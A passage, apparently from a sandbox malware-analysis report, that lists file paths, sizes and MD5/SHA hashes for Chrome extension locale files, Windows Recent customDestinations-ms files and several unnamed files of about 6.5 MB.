  MD5: 2a1e12a4811892d95962998e184399d8
  SHA1: 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
  SHA256: 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
  SHA512: bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

- C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json
  Filesize: 136B
  MD5: 238d2612f510ea51d0d3eaa09e7136b1
  SHA1: 0953540c6c2fd928dd03b38c43f6e8541e1a0328
  SHA256: 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
  SHA512: 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

- C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json
  Filesize: 150B
  MD5: 0b1cf3deab325f8987f2ee31c6afc8ea
  SHA1: 6a51537cef82143d3d768759b21598542d683904
  SHA256: 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
  SHA512: 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

- Filesize: 10KB
  MD5: 6263492cad31587eeaebe54841a913de
  SHA1: c0a0d95fda568a7e87f520654a6e4f673977a659
  SHA256: 484df10437e1288fe4ed95c1458b2520f73227a541e7694b07049d7ea0adf4dc
  SHA512: f091e9ba9ee052567476341d4ec94d74cf4cd15d5663312f8fd92a22b371c81e0b73d51ebfbe682c8394b22f35242c2961bb41fc51bbbee3426e5ea2ab2c2fee

- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: bda73eecb76840daa19eca61711a1c37
  SHA1: 66698dde4c0976da38898bdfdd20c2e016428a7c
  SHA256: ebc0f7a1d36ee402647fe7d120eae2f4e94fc1bc9f34e82b725b3cf66b4c7d67
  SHA512: bf9215b47fd38fd33a397be8b7611c5b5690cc27d0a2f6d0b2c5ef359f4565a1255e510390dc1e67e3591e246a93b36a7800937e692b2604415c303592702b79

- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: 0a567b8bc8378e2a5dd6826b76a4d6f2
  SHA1: b42c32e919e27d08a9938ba9e2f3dd1a54ffee7e
  SHA256: 710f43401f05cceb56c8e634c6a517e6d710cb8d76eea3382ce6ce1f3c30fbd8
  SHA512: 86e3ee33bc40ecfab36fec49305e5c473ec1b6ad91bc9ddf145f5207860cfc7bbedc0bc0113e2f187809a9b4bf359af935269932e24fa1848f0acea19ca9fc2d

- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
  Filesize: 7KB
  MD5: 3857a9ee970ee59e1dd9aa5993b2acab
  SHA1: 74ac17d38a75eff4b318822cca3ce293fe48e21a
  SHA256: 0413cde3bfca7a186dd6db0a26a3bfc158d583dd26ecfbebb45a8fde30519f85
  SHA512: 716ca6ffe580ecf08ecce8cd52a88046b62426a0cfecc3ff1bcfc7279547a9f1d11af7b431ce268b08b215da1b7ee4ed4c3fddc8d6458355ec2541b4b906baec

- Filesize: 7KB
  MD5: 5b2812a8def01bd36355568e3b58d8fb
  SHA1: 9fbd359a46014c36a97184fc89ee3b6137222afb
  SHA256: 2aa04fd9a7b6120bd225557cf6d140d69d2a2482df62a4b894d7080552453734
  SHA512: deabf5082da0173a5391e6deb8ec0e91a3636a2c7660306cca2d7026f6fc6b9199950fe14d6f3308fd77fe29cf46cb0dba4b2f664f9cf04016b994e6716ca038

- Filesize: 9KB
  MD5: 324f0455234fecd0e180f82174522dc4
  SHA1: 845e4b74bdffd042b5fb975d64bb21c731009d3a
  SHA256: 157adfff9722ed4036505039889f7645a0a3e9f410d0a8469a57a22b12a7bc34
  SHA512: f3a5ecc3063b76eb3c9214cbc7bae1ac5c39fe20cdd451be5ecf8d757ea59a4bc9872601aa4c2adc71416ea8c16f836d7ee80d10d3b3c55caac2c5025c7dbd79

- Filesize: 6.5MB
  MD5: cfe428169166545941ae665ac1d2578c
  SHA1: 8820ba8de5ce6658c6968f40117b5e8a3a1f4eab
  SHA256: fd819cf2f5db063ba817d32d14ca2e5d75364807cc9ba53248dfc1578b90dc53
  SHA512: 49442efba4dc52121d6e5f91210a73a9479682cc976b90da333bc601f3789e12588cfd3933eafe7ce260ef93b2d8eade6f31b0d65c5ca0728e8df961e8a36d96

- Filesize: 6KB
  MD5: c559b9e00b20d6f92cc813d899a4e100
  SHA1: 4803773dcbcf83fcc99830267b4149369909491e
  SHA256: 138cf60e1e9329ae6b5fdf3448f33e5c482c72814777ef709bfa902843232745
  SHA512: 3649030e1663627e11dbc56f6073026f2438d9047db218eee2de8ab012a020491324250056cf81c9da85668ddb7efbd2bf5a36790932dfdfb7c1ed38e28c6471

- Filesize: 6.4MB
  MD5: aaef9b8c0610b8465e21846d327686bb
  SHA1: 82ec975f472399b0d82e60df0312b866e0f91709
  SHA256: dc7b0a8e34ab5558f0fb0a52a92261556110d1ce094f34be8fcbe408535fc379
  SHA512: 4f33cd8fc62e109d3a598a4630ffc2603827a3b4b49ae2e7a184585ca7ea83790d9b3f60d46889606c940cf46bfe949d41339bf2d70383dad43c3ce160176119

- Filesize: 6.6MB
  MD5: d121107c5261ab15018ad1e759aa45a5
  SHA1: c8753c8765f20a1187ffb749f3a5592276e2415f
  SHA256: 30afb4810b65dd25f3883bea4158c3e00d2c666260cdeb880b105f11aab89d61
  SHA512: c5ec43cc109c57f4c3eec34dfcf2b17f6791415dff8b6e780bceed4c8bd6cd90ac962b4beb712d489bb7ab78c7b4537623594f56d2cbc6becc020d7d38dfd41b